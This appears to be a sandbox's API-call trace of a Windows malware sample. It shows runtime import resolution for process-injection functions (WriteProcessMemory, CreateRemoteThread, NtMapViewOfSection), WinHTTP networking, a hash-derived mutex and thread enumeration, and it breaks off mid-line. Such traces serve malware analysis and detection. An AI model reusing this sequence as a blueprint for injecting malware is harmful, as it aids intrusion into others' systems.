GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0169.506] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0169.507] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0169.507] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0169.507] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0169.507] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0169.507] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0169.507] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0169.507] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0169.507] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0169.507] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0169.507] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0169.507] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0169.507] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0169.507] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0169.508] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0169.508] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0169.508] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0169.508] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0169.508] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0169.508] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0169.508] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0169.508] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0169.508] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0169.508] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0169.508] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0169.508] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0169.509] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0169.509] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0169.509] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0169.509] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0169.509] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0169.509] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0169.509] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0169.509] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0169.509] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0169.518] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0169.518] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0169.518] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0169.522] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0169.522] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0169.522] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0169.523] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0169.523] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0169.523] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0169.523] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0169.523] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0169.523] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0169.523] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0169.523] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0169.523] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0169.526] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0169.526] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0169.526] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0169.526] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0169.526] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0169.526] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0169.527] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0169.527] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0169.527] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0169.527] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0169.527] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0169.527] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0169.527] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0169.527] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0169.527] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0169.527] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0169.527] VirtualProtect (in: lpAddress=0x160000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x1fefd4c | out: lpflOldProtect=0x1fefd4c*=0x40) returned 1 [0169.528] VirtualProtect (in: lpAddress=0x160000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1fefd4c | out: lpflOldProtect=0x1fefd4c*=0x4) returned 1 [0169.529] VirtualQuery (in: lpAddress=0x170016, lpBuffer=0x1fefd44, dwLength=0x1c | out: lpBuffer=0x1fefd44*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0169.529] GetProcessHeap () returned 0x430000 [0169.529] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x364) returned 0x4505f8 [0169.529] RtlMoveMemory (in: Destination=0x4505f8, Source=0x170016, Length=0x363 | out: Destination=0x4505f8) [0169.529] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x170016) returned 0x0 [0169.529] GetCurrentProcessId () returned 0x320 [0169.529] GetProcessHeap () returned 0x430000 [0169.529] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x105) returned 0x450968 [0169.529] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x450968, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Portable Devices\\objects-virus-israeli.exe" (normalized: "c:\\program files\\windows portable devices\\objects-virus-israeli.exe")) returned 0x43 [0169.529] GetProcessHeap () returned 0x430000 [0169.530] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x105) returned 0x450a78 [0169.530] GetCurrentProcessId () returned 0x320 [0169.530] wsprintfA (in: param_1=0x450a78, param_2="%s%d%d%d" | out: param_1="C:\\Program Files\\Windows Portable Devices\\objects-virus-israeli.exe3708421248003") returned 80 [0169.530] CryptAcquireContextA (in: phProv=0x1fefd48, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1fefd48*=0x450bc8) returned 1 [0169.745] CryptCreateHash (in: hProv=0x450bc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x1fefd4c | out: phHash=0x1fefd4c) returned 1 [0169.745] lstrlenA (lpString="C:\\Program Files\\Windows Portable Devices\\objects-virus-israeli.exe3708421248003") returned 80 [0169.745] CryptHashData (hHash=0x4514e0, pbData=0x450a78, dwDataLen=0x50, dwFlags=0x0) returned 1 [0169.745] CryptGetHashParam (in: hHash=0x4514e0, dwParam=0x2, pbData=0x1fefd38, pdwDataLen=0x1fefd50, dwFlags=0x0 | out: pbData=0x1fefd38, pdwDataLen=0x1fefd50) returned 1 [0169.745] wsprintfA (in: param_1=0x450a78, param_2="%02X" | out: param_1="2B") returned 2 [0169.745] wsprintfA (in: param_1=0x450a7a, param_2="%02X" | out: param_1="CF") returned 2 [0169.745] wsprintfA (in: param_1=0x450a7c, param_2="%02X" | out: param_1="A5") returned 2 [0169.745] wsprintfA (in: param_1=0x450a7e, param_2="%02X" | out: param_1="16") returned 2 [0169.745] wsprintfA (in: param_1=0x450a80, param_2="%02X" | out: param_1="A3") returned 2 [0169.745] wsprintfA (in: param_1=0x450a82, param_2="%02X" | out: param_1="65") returned 2 [0169.745] wsprintfA (in: param_1=0x450a84, param_2="%02X" | out: param_1="E8") returned 2 [0169.745] wsprintfA (in: param_1=0x450a86, param_2="%02X" | out: param_1="67") returned 2 [0169.745] wsprintfA (in: param_1=0x450a88, param_2="%02X" | out: param_1="FC") returned 2 [0169.746] wsprintfA (in: param_1=0x450a8a, param_2="%02X" | out: param_1="BC") returned 2 [0169.746] wsprintfA (in: param_1=0x450a8c, param_2="%02X" | out: param_1="FD") returned 2 [0169.746] wsprintfA (in: param_1=0x450a8e, param_2="%02X" | out: param_1="92") returned 2 [0169.746] wsprintfA (in: param_1=0x450a90, param_2="%02X" | out: param_1="98") returned 2 [0169.746] wsprintfA (in: param_1=0x450a92, param_2="%02X" | out: param_1="48") returned 2 [0169.746] wsprintfA (in: param_1=0x450a94, param_2="%02X" | out: param_1="A1") returned 2 [0169.746] wsprintfA (in: param_1=0x450a96, param_2="%02X" | out: param_1="B1") returned 2 [0169.746] CryptDestroyHash (hHash=0x4514e0) returned 1 [0169.746] CryptReleaseContext (hProv=0x450bc8, dwFlags=0x0) returned 1 [0169.746] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="2BCFA516A365E867FCBCFD929848A1B1") returned 0x80 [0169.746] GetLastError () returned 0x0 [0169.746] Sleep (dwMilliseconds=0x1f4) [0170.276] GetCurrentProcessId () returned 0x320 [0170.276] GetCurrentThreadId () returned 0x980 [0170.276] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0170.278] Thread32First (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.278] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.279] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.279] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.279] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.279] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.280] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.280] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.280] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.281] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.281] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.281] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.281] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.282] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.282] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.282] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.283] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.283] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.283] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.284] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.284] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.284] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.284] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.285] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.285] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.285] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.285] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.286] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.286] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.286] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.287] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.287] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.287] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.287] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.288] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.288] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.288] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.288] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.289] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.289] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.289] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.290] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.290] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.290] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.290] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.291] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.291] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.291] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.292] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.292] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.292] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.292] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.293] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.293] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.293] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.294] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.294] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.294] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.294] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.296] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.297] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.297] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.297] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.297] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.298] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.298] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.298] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.299] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.299] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.299] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.299] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.300] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.300] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.300] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.301] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.301] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.301] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.301] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.302] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.302] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.302] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.303] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.303] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.303] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.303] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.304] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.304] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.304] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.304] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.305] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.305] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.305] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.306] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.306] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.306] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.306] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.307] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.307] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.307] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.307] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.308] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.308] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.308] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.309] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.309] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.309] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.309] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.310] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.310] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.310] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.310] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.311] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.311] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.311] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.312] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.312] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.312] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.312] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.313] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.313] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.313] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.352] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.352] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.352] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.352] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.353] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.353] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.353] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.354] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.354] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.354] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.354] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.355] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.355] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.355] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.356] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.356] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.356] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.356] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.357] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.357] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.357] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.357] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.358] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.358] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.358] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.359] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.359] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.359] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.359] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.360] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.360] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.360] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.360] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.361] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.361] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.361] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.362] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.362] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.362] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.362] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.363] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.363] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.363] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.364] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.364] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.364] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.364] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.365] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.365] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.365] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.367] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.367] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.367] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.367] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.368] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.368] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.368] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.369] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.369] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.369] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.369] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.370] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.370] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.370] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.371] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.371] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.371] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.371] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.372] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.372] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.372] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.372] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.373] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.373] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.373] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.374] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.374] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.374] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.374] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.375] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.375] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.375] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.375] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.376] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.376] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.376] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.377] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.377] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.377] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.377] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.378] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.378] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.378] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.379] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.379] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.379] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.379] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.380] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.380] Thread32Next (hSnapshot=0x88, 